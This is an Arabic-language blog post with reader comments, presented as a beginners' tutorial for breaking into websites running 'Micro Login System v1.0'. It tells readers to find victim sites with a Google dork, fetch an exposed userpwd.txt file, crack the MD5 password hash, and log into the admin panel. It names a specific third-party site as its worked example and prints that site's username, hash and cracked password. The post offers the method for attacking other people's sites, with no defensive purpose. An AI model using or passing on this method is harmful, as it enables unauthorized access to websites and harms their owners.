انظم الينا على :

اجدد المواضيع :

شرح ثغرة Micro Login System للإختراق المواقع المصابة بها




اليوم قررت ان افيدكم بثغرة قديـمة ولاكن فعالة

ادهب الى
google
وتكتب الدورك
Micro Login System v 1.0

ومن هنا  تعريف للدورك وماذا يقصد به

ستجد مواقع كثيرة
انا على سبيل المثال وجدت
http://www.rjonesprintanddisplay.com/ftp/login.php
rjonesprintanddisplay.com : نغيره بإسم الموقع المستهدف
ندخل عليه نجده يطلب يوزر ولوحة التحكم
طيب الان نحذف login.php
ونعوضها بـ userpwd.txt
http://www.rjonesprintanddisplay.com/ftp/userpwd.txt
تمام الان طلع لنا اليوزر و الباس على شكل هاش
user:alex
password:83e1ea39c9d3b1999c0bfe5b8bf1fd9a
طيب بقى لنا الان نفك الهاش سهلة

نفك الهاش من الموقع التالي
:

user : alexpassword : hellooo


الان نرجع الى
http://www.rjonesprintanddisplay.com/ftp/login.php

ونحط في اليوزر : alexوفي الباسورد : hellooo


هده تغرة للمبتدئين فقط و مبروك عليك المواقع و انتظروا الجديد ان شاء الله,وتذكرو دائما فهذه الثغرة ليست فعالة دائما.وليست مع كل المواقع سوى المواقع المصابة بهذه الثغرة فقط.

شاركه

عن Unknown

هذا النص الغبي ، غير مقصود لقرائته . وفقا لذلك فمن الصعب معرفة متى وأين نهايته ، لكن حتى . فإن هذا النص الغبي ، ليس مقصود لقرائته . نقطة رجوع لسطر مدونة مدون محترف ترحب بك.
    تعليقات بلوجر
    تعليقات فيسبوك

6 التعليقات:

  1. يعطيك العافية

    ردحذف
  2. يسلمو يا بطل

    ردحذف
  3. مشكور والله مواضيعك كلها بتعجبني وأفادتني كثير

    ردحذف
  4. شكرا على مروركم القيم

    ردحذف
  5. تسلم الأيادي الي كتبت هذا الموضوع

    ردحذف
  6. مشكور أخوي

    ردحذف